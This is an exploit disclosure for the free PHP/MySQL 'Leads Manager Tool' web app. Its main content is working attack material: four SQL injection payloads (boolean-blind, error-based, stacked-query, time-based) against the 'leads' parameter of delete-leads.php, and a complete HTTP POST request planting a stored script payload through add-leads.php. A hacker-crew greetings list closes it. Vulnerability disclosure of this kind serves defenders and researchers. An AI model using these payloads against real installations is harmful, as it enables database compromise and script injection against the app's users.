Leads Manager Tool SQL Injection / Cross Site Scripting

`[x]========================================================================================================================================[x]  
| Title : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities  
| Software : Leads Manager Tool Using PHP and MySQL with Source Code  
| Create By : https://www.sourcecodester.com/users/remyandrade  
| First Release: 25/01/22  
| Download : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html  
| Date : 30 Agustus 2024  
| Author : OoN_Boy  
[x]========================================================================================================================================[x]  
| Technology : PHP  
| Database : MySQL  
| Price : FREE  
| Description : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information  
[x]========================================================================================================================================[x]  
  
[O] Exploit  
  
http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  
http://localhost/leads-manager-tool/endpoint/add-leads.php  
  
[O] Proof of concept  
  
[SQL]  
Parameter: leads (GET)   
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: leads= --emurate';SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt  
  
[XSS]   
POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  
Host: 127.0.0.1  
Accept-Encoding: gzip, deflate, br  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Origin: http://127.0.0.1  
Upgrade-Insecure-Requests: 1  
Referer: http://127.0.0.1/leads-manager-tool/  
Content-Type: application/x-www-form-urlencoded  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 85  
  
leads_name=Vrs<script>alert(1)</script>Hck&[email protected]&phone_number=911-911-9111  
  
[x]========================================================================================================================================[x]  
  
[O] Greetz  
  
BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^  
  
[x]========================================================================================================================================[x]  
  
  
`